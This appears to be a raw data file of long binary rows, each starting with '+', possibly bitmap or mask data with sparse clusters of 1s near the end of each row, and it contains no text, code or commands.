+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111110000000000000000000110111101000000000000001011110111101111010000000000000000000110111101000000000000001011110111101111010000000000011111110110111101000000000000001011110111101111010000000000000000000110111101000000000000001011110111101111010000000000000000000000000000000000000000000000000000000000000000000000000000001001111000111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000100011100010010000000000000000000000000000000000000001100000000001000000001000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000011001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100001001000000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110110001000001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000111010000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000100000100000000100000000000000000000000000000000000000001000000100000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101101010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110110000000000000000000001100000000000000011000000000000001000000000000000000001000011110000100000000000000010000000011010000000000011111100000000000000000100100000000000000000011001010000000011111100000000000000000001000000000000000001100000000000000011111000001000000000000111101000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000001010000110110111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000100000000000000000000000000000100000000000000000000000000000100000000000000000000000000001100000000000001000100000000000000000000000000000000000000000000000000000010111000000000000000000000000000000000010000000000000000000010110000000000000000000010000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101001000010100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000001000000000000000000000000100000000000001000000000000000000000000000000000000000000011100000000000000001000000000010000000000000001101100000000000000000010000000000000000000000001000000000001110100000100000000000000001000000000000000000000000000000001100000000100000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001110111101010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000010000000000000000000000000000000000000010000000000100000000000000000000000000000000000000001101100000000000000000100000000000000000000000010000000000001001000100000000000000000000000000000000001000000000000000001001000100100000000000010000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000001011000100010111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011011000011000000000000000000000000001101000000001100000000110100100100100000001111011000000000000000000000000000000000000000000000000010000000000000000000000000011010011000010000010001100000000000000000011000000000011111000000000000000001100000000100100010000000000000000000000000000100000000100000011000100011010010000000011000000100000000011000000000010000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000111011011111100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000011000000000000000000000000000001010000000000000000000000000000000000000010010000100000000000000000000000000000000000000000000000000000000000000000000000000001001000001000000000000000000000000000000000000000000001010000000000000000000010000000000000000000000000000000000000000000000000000000001001000001001000000000000000100000000000000101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100111011110101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000010000000010000000110000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000010000000000000000001100000000000010000000000000000000010000000100000010000000000000000000000000000010000010000000000000010000000100000000000000000000100000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001111011100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000010010000000000000000000000000000000000000010000000000100000001000010000010000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000010000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000010000000000000100000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000001001001001001000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000001100000000110000000000001100000000001101000000000000000100000000000000000000000100100010001100001100000000000000000000100100000000011000000011000010000010001100000010001100000100000000010000000000100110010010011111010010000010000000011000000000010000000000100000000000000000001100000000001100000000000000000000000000000100100010001100000000000000000000000000000000000000000000000000000000000000000000000011010100000110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000001000000000000000000000000000000000000000000000000000010000000000000000001000000000000000000010000000001001000000000010000000000000001000000000000000000000000000000000000000000010000001010000100000000000000000010000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011100001110111111111111111111111111111111111111111111111111111 